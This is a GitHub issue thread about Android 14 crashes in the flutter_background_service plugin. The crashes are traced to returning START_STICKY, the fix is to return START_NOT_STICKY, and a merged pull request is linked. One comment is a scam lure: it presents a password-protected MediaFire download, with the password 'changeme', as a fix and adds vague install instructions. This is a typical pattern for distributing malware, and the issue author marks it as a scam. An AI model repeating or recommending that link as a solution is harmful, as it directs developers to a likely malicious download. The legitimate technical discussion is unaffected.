### ISSUE TITLE
[Android 14] Early crashes due to `START_STICKY`

### ISSUE THREAD

**Issue by sarthakydv** [ekasetiawans/flutter_background_service#476]
We are seeing a lot of crashes in production for Android 14 users
```
Fatal Exception: java.lang.RuntimeException
Unable to create service id.flutter.flutter_background_service.BackgroundService: android.app.ForegroundServiceStartNotAllowedException: Service.startForeground() not allowed due to mAllowStartForeground false: service com.package.mine/id.flutter.flutter_background_service.BackgroundService
```
On investigation, I have found [this thread from google](https://issuetracker.google.com/issues/307329994?pli=1)

The suggested solution is to return `START_NOT_STICKY` in `onStartCommand`

This should be a non-issue for service stability since the `WatchdogReciever` ensures that the service is restarted in the package and should allow us to remove `START_STICKY` without any negative consequences

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by sarthakydv** [comment]
Please ignore scam: https://github.com/ekasetiawans/flutter_background_service/issues/476#issuecomment-2311443485

**Comment by sarthakydv** [comment]
Raised PR for the change: https://github.com/ekasetiawans/flutter_background_service/pull/477

**Comment by sarthakydv** [comment]
PR merged

**Comment by pieroashady** [comment]
Bro, i've updated to this version, but the service didnt restart.. any help?
